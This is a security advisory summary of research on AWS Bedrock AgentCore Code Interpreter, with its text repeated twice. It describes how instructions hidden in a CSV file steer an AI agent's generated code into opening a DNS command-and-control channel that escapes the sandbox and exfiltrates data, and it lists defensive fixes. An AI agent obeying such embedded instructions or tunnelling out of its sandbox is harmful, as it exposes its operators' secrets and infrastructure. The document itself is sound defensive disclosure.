Pwning AI Code Interpreters in AWS Bedrock AgentCore
Summary:
BeyondTrust’s Phantom Labs research team, uncovered a critical architectural flaw in the AWS Bedrock AgentCore Code Interpreter, a managed service that enables AI agents to write and execute code for tasks such as data analysis and calculations. The vulnerability centers on AgentCore's "Sandbox" mode, which AWS originally advertised as providing complete network isolation. Researchers discovered that despite blocking most outbound traffic, Sandbox mode permits outbound DNS queries for A and AAAA records, which threat actors can exploit to establish a bidirectional command-and-control channel.
The attack chain begins with a malicious CSV file containing embedded instructions. When an AI agent processes the file and generates Python code for execution within the Code Interpreter, the embedded content can influence that generated code, redirecting it from normal data analysis tasks to communicating with an external attacker-controlled server via DNS queries.
Researchers demonstrated a proof-of-concept command-and-control channel by encoding stolen information in chunked ASCII within DNS subdomains, establishing a two-way communication path with the isolated environment, effectively circumventing AWS's security controls even in supposedly air-gapped deployments.
Phantom Labs disclosed the flaw to AWS in September 2025. AWS acknowledged the report and deployed an initial fix in November, but rolled it back due to technical issues. By December 2025, AWS declared the behavior "intended functionality rather than a defect" and updated its documentation in lieu of a patch, assigning the vulnerability a CVSS score of 7.5 (High).
Security Officer Comments:
Once a DNS-based covert channel is established, the impacts are directly tied to the IAM permissions assigned to the Code Interpreter's execution role. If the agent operates with overly broad IAM roles, attackers can leverage that channel to execute arbitrary commands, exfiltrate sensitive data, and potentially obtain an interactive reverse shell, all without triggering network-layer restrictions. Attackers with access to this channel could extract passwords, customer data, Amazon S3 contents, and Secrets Manager values, or even delete infrastructure if the Code Interpreter has been granted excessive privileges.
Beyond direct data theft, the research surfaces compounding attack vectors: prompt injection via malicious inputs could trick the AI into executing unauthorized code, and the Code Interpreter's dependency on 270+ third-party libraries presents a supply chain risk whereby any compromised library could introduce backdoors into the execution environment.
Because AWS has declined to patch the underlying behavior, the risk is now a shared-responsibility issue, requiring organizations deploying AgentCore to adapt their own security posture rather than relying on platform-level remediation.
Suggested Corrections:
Organizations using AWS Bedrock AgentCore Code Interpreter in Sandbox mode should treat that isolation boundary as untrustworthy and take immediate compensating action.
Administrators should inventory all active AgentCore Code Interpreter instances and migrate those handling critical or sensitive data from Sandbox mode to VPC mode, which enforces stricter network isolation by routing traffic through customer-controlled infrastructure.
Teams should rigorously audit all IAM roles associated with Code Interpreter sessions, applying least-privilege principles to constrain the blast radius if the DNS channel is exploited.
Deploying DNS sinkholes and deception-based security controls is recommended to detect covert DNS exfiltration activity.
Additionally, organizations should monitor CloudTrail logs for anomalous Code Interpreter invocations, restrict the bedrock-agentcore:InvokeCodeInterpreter and bedrock-agentcore:StartCodeInterpreterSession permissions to only explicitly authorized identities, and review third-party library dependencies within any custom Code Interpreter configurations for supply chain exposure.
Given AWS's posture that this behavior is intentional, no vendor patch should be anticipated, customer-side hardening is the primary defensive avenue.
Link(s):
https://www.beyondtrust.com/blog/entry/pwning-aws-agentcore-code-interpreter
BeyondTrust’s Phantom Labs research team, uncovered a critical architectural flaw in the AWS Bedrock AgentCore Code Interpreter, a managed service that enables AI agents to write and execute code for tasks such as data analysis and calculations. The vulnerability centers on AgentCore's "Sandbox" mode, which AWS originally advertised as providing complete network isolation. Researchers discovered that despite blocking most outbound traffic, Sandbox mode permits outbound DNS queries for A and AAAA records, which threat actors can exploit to establish a bidirectional command-and-control channel.
The attack chain begins with a malicious CSV file containing embedded instructions. When an AI agent processes the file and generates Python code for execution within the Code Interpreter, the embedded content can influence that generated code, redirecting it from normal data analysis tasks to communicating with an external attacker-controlled server via DNS queries.
Researchers demonstrated a proof-of-concept command-and-control channel by encoding stolen information in chunked ASCII within DNS subdomains, establishing a two-way communication path with the isolated environment, effectively circumventing AWS's security controls even in supposedly air-gapped deployments.
Phantom Labs disclosed the flaw to AWS in September 2025. AWS acknowledged the report and deployed an initial fix in November, but rolled it back due to technical issues. By December 2025, AWS declared the behavior "intended functionality rather than a defect" and updated its documentation in lieu of a patch, assigning the vulnerability a CVSS score of 7.5 (High).
Security Officer Comments:
Once a DNS-based covert channel is established, the impacts are directly tied to the IAM permissions assigned to the Code Interpreter's execution role. If the agent operates with overly broad IAM roles, attackers can leverage that channel to execute arbitrary commands, exfiltrate sensitive data, and potentially obtain an interactive reverse shell, all without triggering network-layer restrictions. Attackers with access to this channel could extract passwords, customer data, Amazon S3 contents, and Secrets Manager values, or even delete infrastructure if the Code Interpreter has been granted excessive privileges.
Beyond direct data theft, the research surfaces compounding attack vectors: prompt injection via malicious inputs could trick the AI into executing unauthorized code, and the Code Interpreter's dependency on 270+ third-party libraries presents a supply chain risk whereby any compromised library could introduce backdoors into the execution environment.
Because AWS has declined to patch the underlying behavior, the risk is now a shared-responsibility issue, requiring organizations deploying AgentCore to adapt their own security posture rather than relying on platform-level remediation.
Suggested Corrections:
Organizations using AWS Bedrock AgentCore Code Interpreter in Sandbox mode should treat that isolation boundary as untrustworthy and take immediate compensating action.
Administrators should inventory all active AgentCore Code Interpreter instances and migrate those handling critical or sensitive data from Sandbox mode to VPC mode, which enforces stricter network isolation by routing traffic through customer-controlled infrastructure.
Teams should rigorously audit all IAM roles associated with Code Interpreter sessions, applying least-privilege principles to constrain the blast radius if the DNS channel is exploited.
Deploying DNS sinkholes and deception-based security controls is recommended to detect covert DNS exfiltration activity.
Additionally, organizations should monitor CloudTrail logs for anomalous Code Interpreter invocations, restrict the bedrock-agentcore:InvokeCodeInterpreter and bedrock-agentcore:StartCodeInterpreterSession permissions to only explicitly authorized identities, and review third-party library dependencies within any custom Code Interpreter configurations for supply chain exposure.
Given AWS's posture that this behavior is intentional, no vendor patch should be anticipated, customer-side hardening is the primary defensive avenue.
Link(s):
https://www.beyondtrust.com/blog/entry/pwning-aws-agentcore-code-interpreter